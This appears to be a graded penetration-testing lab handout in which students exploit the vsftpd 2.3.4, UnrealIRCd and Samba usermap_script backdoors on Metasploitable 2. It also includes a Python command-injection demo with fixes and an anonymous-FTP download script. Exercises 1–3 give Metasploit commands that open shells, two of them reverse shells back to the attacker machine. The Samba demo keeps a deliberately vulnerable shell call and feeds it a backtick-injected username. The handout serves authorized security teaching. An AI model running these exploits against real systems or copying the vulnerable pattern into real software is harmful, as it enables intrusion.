Week 7 graded lab. First exploitation lab. Authorized practice ranges only. Evidence required for every exploit.
Learning objectives
- Apply Metasploit modules to exploit known vulnerabilities on authorized targets
- Read public exploit code (searchsploit / Exploit-DB) and understand the vulnerability mechanism before running
- Write a Python script to exploit a misconfiguration without a framework
- Produce a lab report with reproducible evidence for each finding
Authorization
Targets:
- Metasploitable 2 -- your local VM on the lab network (Host-Only). All ports and services are intentionally vulnerable and authorized to exploit.
- HackTheBox retired machines (if HTB access provided) -- via HTB VPN only; authorized by the HTB platform's terms of service.
CRITICAL: Before starting any exploit, confirm in writing in your lab session log: the target IP, the authorized scope, and the authorization basis (lab VM / HTB platform authorization). This is not a formality -- it is the professional habit the capstone requires.
Not authorized:
- Any system outside the lab IP range or HTB VPN tunnel
- Denial-of-service payloads
- Persistent backdoors that survive a VM reset
Pre-lab setup
Verify the lab environment:
# Terminal session logging -- START THIS FIRST:
mkdir -p ~/pen101-workspace/lab-07
script -a ~/pen101-workspace/lab-07/session.log
# Confirm lab network connectivity:
ping -c 3 <metasploitable2-ip>
# Start Metasploit:
msfconsole
Leave script running for the entire lab session. Every command and output is captured.
Exercise 1: vsftpd 2.3.4 backdoor (CVE-2011-2523)
Step 1: Confirm the service version
Before exploiting, verify that the target is actually running the vulnerable version:
nmap -sV -p 21 <metasploitable2-ip>
# Expected: vsftpd 2.3.4
Record the Nmap output in your lab report. The version match between the scanner and the CVE is what makes this a verified finding.
Step 2: Exploit with Metasploit
msfconsole # skip if it is already running from the pre-lab setup
msf6 > search vsftpd
msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
msf6 exploit(vsftpd_234_backdoor) > show options
msf6 exploit(vsftpd_234_backdoor) > set RHOSTS <metasploitable2-ip>
msf6 exploit(vsftpd_234_backdoor) > run
If the exploit succeeds, you receive a shell on the backdoor listener (TCP/6200), which the daemon opens as root, so expect uid=0. Immediately run:
id && whoami && hostname && uname -a
Screenshot this output. This is the proof-of-exploitation artifact: it ties the shell to the target hostname and shows the privilege level obtained.
Step 3: Understand the exploit mechanism
searchsploit vsftpd 2.3.4
searchsploit -m 17491 # copy the exploit to your current directory
cat 17491.rb # read the Metasploit module source
Read the module source. In your lab report, write a paragraph answering: what network action does the exploit perform? What is the backdoor? Why does it work without authentication?
Exercise 2: UnrealIRCd 3.2.8.1 backdoor (CVE-2010-2075)
Step 1: Confirm the service
nmap -sV -p 6667 <metasploitable2-ip>
# Expected: UnrealIRCd
Step 2: Exploit
msf6 > use exploit/unix/irc/unreal_ircd_3281_backdoor
msf6 exploit(unreal_ircd_3281_backdoor) > set RHOSTS <metasploitable2-ip>
msf6 exploit(unreal_ircd_3281_backdoor) > set PAYLOAD cmd/unix/reverse
msf6 exploit(unreal_ircd_3281_backdoor) > set LHOST <kali-ip>
msf6 exploit(unreal_ircd_3281_backdoor) > run
Proof screenshot: id && hostname
Step 3: Understand the mechanism
Look up CVE-2010-2075 on the NVD and read the description. In your lab report: what was the backdoor, how did it get into the 3.2.8.1 tarball that mirrors distributed (the NVD entry describes an externally introduced modification), and what does it do at the network level? What does "supply chain compromise" mean in this context, given that the project's own source repository was not the thing that was modified?
Exercise 3: Samba "username map script" (CVE-2007-2447)
Step 1: Confirm Samba
nmap -sV -p 445 <metasploitable2-ip>
# Expected: Samba 3.x.x
Step 2: Exploit
msf6 > use exploit/multi/samba/usermap_script
msf6 exploit(usermap_script) > set RHOSTS <metasploitable2-ip>
msf6 exploit(usermap_script) > set PAYLOAD cmd/unix/reverse
msf6 exploit(usermap_script) > set LHOST <kali-ip>
msf6 exploit(usermap_script) > run
Proof screenshot: id && hostname
Step 3: The command injection mechanism
The vulnerability is in Samba's username map script feature (the smb.conf option "username map script"). When it is set, smbd builds a shell command line from the configured script and the client-supplied username and runs it through /bin/sh without escaping the username. Shell metacharacters in the username (backticks are the classic vector) are therefore parsed as shell syntax, and the command they wrap runs with smbd's privileges before any password is checked. Write a one-paragraph explanation of what "command injection" means at the operating system level. What is the injection point? What is the injected command?
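The injection pattern and its fix, as an added Python example for this handout (it is not Samba code): run_map_script_vulnerable() concatenates the username into a shell command line the way the vulnerable releases did, run_map_script_argv() passes it as a single argv element instead, and map_username() adds an allow-list in front. MAP_SCRIPT stands in for the administrator's map script, and the backtick username in __main__ is a constructed, harmless injected command.

```python
#!/usr/bin/env python3
"""OS-level command injection, using the username map script pattern behind CVE-2007-2447.

Added example, not Samba source. Vulnerable Samba releases built a /bin/sh
command line from the configured script and the client-supplied username and
handed it to the shell unescaped; run_map_script_vulnerable() reproduces that
pattern with a harmless stand-in script, run_map_script_argv() shows the fix.
"""
import re
import subprocess

# Constructed stand-in for the administrator's username map script: it prints
# the name it was asked to map. In a real deployment this would be a path from
# smb.conf, e.g. "username map script = /usr/local/sbin/mapuser".
MAP_SCRIPT = "printf 'mapped:%s\\n'"

# Allow-list a username must match before it goes anywhere near a process.
USERNAME_RE = re.compile(r"^[A-Za-z0-9._-]{1,32}$")


def run_map_script_vulnerable(username):
    """The flawed pattern: string concatenation, then /bin/sh parses the result.

    The injection point is the username; anything the shell treats as syntax
    (backticks, $(...), ;, |) becomes code that runs as the service user.
    """
    command_line = f"{MAP_SCRIPT} {username}"
    out = subprocess.run(command_line, shell=True, capture_output=True, text=True)
    return out.stdout


def run_map_script_argv(username):
    """Fix 1: pass the username as one argv element.

    The stand-in script receives the name as $1; the result of a parameter
    expansion is data to the shell, so metacharacters inside it are never
    re-parsed as commands.
    """
    argv = ["sh", "-c", "printf 'mapped:%s\\n' \"$1\"", "mapuser", username]
    out = subprocess.run(argv, capture_output=True, text=True)
    return out.stdout


def is_valid_username(username):
    """Fix 2, defence in depth: reject names outside the allow-list."""
    return bool(USERNAME_RE.match(username))


def map_username(username):
    """What a hardened service does: validate, then exec with no shell parsing the input."""
    if not is_valid_username(username):
        raise ValueError(f"rejected username: {username!r}")
    return run_map_script_argv(username)


if __name__ == "__main__":
    # Constructed injected command; a real exploit substitutes something like a reverse shell.
    hostile = "admin`echo INJECTED`"
    print("vulnerable :", run_map_script_vulnerable(hostile).rstrip())   # mapped:adminINJECTED
    print("argv       :", run_map_script_argv(hostile).rstrip())         # backticks stay literal
    try:
        map_username(hostile)
    except ValueError as e:
        print("hardened   :", e)
    print("hardened   :", map_username("alice").rstrip())
```

The vulnerable function prints mapped:adminINJECTED because the shell ran `echo INJECTED` while parsing the command line; the argv version prints the backticks unchanged. Both fixes matter: argv form removes the shell from the path, and the allow-list stops a hostile name from reaching whatever the map script itself does with its argument.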
Exercise 4: Manual Python -- FTP anonymous login
No Metasploit, no public exploit. A misconfiguration finding, not a CVE.
Step 1: Verify anonymous login manually
ftp <metasploitable2-ip>
# At Name prompt: anonymous
# At Password prompt: any string (e.g., test@test.com)
# If successful: run ls, then pwd
Step 2: Write the Python script
Write a Python script using ftplib that:
- Connects to the Metasploitable 2 FTP server
- Logs in as anonymous
- Lists the root FTP directory contents
- Downloads one file and saves it locally
- Prints the list of files and the content of the downloaded file
#!/usr/bin/env python3
from ftplib import FTP

TARGET_IP = "<metasploitable2-ip>"   # lab VM address recorded in your session log


def main():
    ftp = FTP(TARGET_IP)
    # Anonymous FTP conventionally takes an e-mail address as the password; any string is accepted
    ftp.login(user='anonymous', passwd='lab@virtusacademy.org')
    print("[+] Logged in as anonymous")
    # List root directory: retrlines calls the callback once per line of LIST output
    files = []
    ftp.retrlines('LIST', files.append)
    print("[+] Directory listing:")
    for f in files:
        print(f)
    # Download the first file found
    # (modify to target a specific file if the listing suggests an interesting one)
    ftp.quit()


if __name__ == '__main__':
    main()
Extend the script to download a file (use ftp.retrbinary() with a callback that writes each block it receives). If the root listing contains files, retrieve one and document its contents. If the listing is empty, the finding still stands: record the successful login and the empty listing as evidence, and try a harmless upload of a small marker file (STOR) so your report states whether anonymous write is also possible; remove the marker afterwards.
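A complete version of the script, added here for the handout and not part of the original lab material. collect_anonymous() carries the ftplib logic and takes any object with the ftplib.FTP methods it calls, so the constructed FakeFtp class lets it run offline; FakeFtp, DEMO_DIR, anonymous_allowed() and the sample file contents are this example's own, and the real-target run assumes a working route to <metasploitable2-ip>.

```python
#!/usr/bin/env python3
"""Complete form of the Exercise 4 script: anonymous login, listing, one download.

Added example, not the handout's starter. collect_anonymous() takes any object
that offers the ftplib.FTP methods it calls, so the constructed FakeFtp class
lets it run (and be tested) offline; in the lab, hand it a real ftplib.FTP
connected to <metasploitable2-ip>.
"""
import io
import os
import sys
import tempfile
from ftplib import FTP, error_perm

DEMO_DIR = os.path.join(tempfile.gettempdir(), "pen101-lab07-demo")


def collect_anonymous(ftp, dest_dir, max_bytes=1_000_000):
    """Log in as anonymous, list the root, download the first regular file.

    Returns {"listing": [...], "downloaded": name-or-None, "path": ..., "size": n}.
    Raises ftplib.error_perm when the server refuses anonymous login (530).
    """
    ftp.login(user="anonymous", passwd="lab@virtusacademy.org")
    listing = []
    ftp.retrlines("LIST", listing.append)       # one callback per line of ls -l style output
    # A LIST line starts with the mode string; 'd' marks a directory, skip those.
    # (last whitespace-separated token is the name; names with spaces need a real parser)
    regular = [line.split()[-1] for line in listing if line and line[0] != "d"]
    result = {"listing": listing, "downloaded": None, "path": None, "size": 0}
    if not regular:
        return result                            # empty root is still evidence: record it
    name = regular[0]
    buf = io.BytesIO()

    def sink(chunk):                             # retrbinary delivers the file in blocks
        if buf.tell() + len(chunk) > max_bytes:
            raise ValueError(f"{name} exceeds max_bytes; choose a smaller file")
        buf.write(chunk)

    ftp.retrbinary(f"RETR {name}", sink)
    os.makedirs(dest_dir, exist_ok=True)
    # basename: never let a server-supplied name such as ../x escape dest_dir
    path = os.path.join(dest_dir, os.path.basename(name))
    with open(path, "wb") as fh:
        fh.write(buf.getvalue())
    result.update(downloaded=name, path=path, size=buf.tell())
    return result


def anonymous_allowed(ftp):
    """True if the server accepts the anonymous account, False on a 530 reply."""
    try:
        ftp.login(user="anonymous", passwd="lab@virtusacademy.org")
        return True
    except error_perm:
        return False


class FakeFtp:
    """Constructed stand-in with the ftplib.FTP methods used above (offline only)."""

    def __init__(self, files, allow_anonymous=True):
        self.files = files                       # name -> bytes
        self.allow_anonymous = allow_anonymous

    def login(self, user="anonymous", passwd=""):
        if user != "anonymous" or not self.allow_anonymous:
            raise error_perm("530 Login incorrect.")

    def retrlines(self, cmd, callback):
        callback("drwxr-xr-x    2 0        65534        4096 Mar 17  2010 pub")
        for name, data in self.files.items():
            callback(f"-rw-r--r--    1 0        0    {len(data):8d} Mar 17  2010 {name}")

    def retrbinary(self, cmd, callback, blocksize=8192):
        data = self.files[cmd.split(" ", 1)[1]]
        for i in range(0, len(data), blocksize):
            callback(data[i:i + blocksize])
        return "226 Transfer complete."

    def quit(self):
        return "221 Goodbye."


def main(argv):
    if len(argv) > 1:                            # python3 ftp_anon.py <metasploitable2-ip>
        ftp, dest = FTP(argv[1], timeout=10), os.path.expanduser("~/pen101-workspace/lab-07/loot")
    else:                                        # offline demo against the stand-in
        ftp, dest = FakeFtp({"welcome.txt": b"constructed sample file\n"}), DEMO_DIR
    try:
        report = collect_anonymous(ftp, dest)
    except error_perm as e:
        print("[-] Anonymous login refused:", e)
        return 1
    finally:
        ftp.quit()
    print("[+] Logged in as anonymous")
    for line in report["listing"]:
        print("   ", line)
    if report["downloaded"] is None:
        print("[!] No regular files in the FTP root; record the empty listing as evidence")
        return 0
    print(f"[+] Saved {report['downloaded']} ({report['size']} bytes) to {report['path']}")
    with open(report["path"], "rb") as fh:
        print(fh.read().decode(errors="replace"))
    return 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

Two details worth carrying into your own version: the size cap on the retrbinary callback, so a careless RETR of a large file does not fill the workspace, and os.path.basename() on the server-supplied name, since a hostile server can return names like ../x in its listing.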
Step 3: Document the finding
This is not a CVE -- it is a misconfiguration. In your lab report, write the finding as you would for a client report:
- Finding title: "FTP Anonymous Login Enabled"
- CVSS v3.1 score: compute it. (AV:N, AC:L, PR:N, UI:N, S:U -- what are the C/I/A impacts given what you were able to access?)
- Description, Evidence, Business Impact, Remediation
Deliverable
A lab report with four sections (one per exercise) containing:
- The CVE number and NVD link (or "N/A -- misconfiguration" for Exercise 4)
- The exact commands run (copy from your session.log)
- The proof-of-exploitation screenshot
- A paragraph describing the vulnerability mechanism
Appendix: the session.log file from your script session.
Stop the session log
When finished:
exit # exits the script session
# lab-07/session.log now contains your full terminal transcript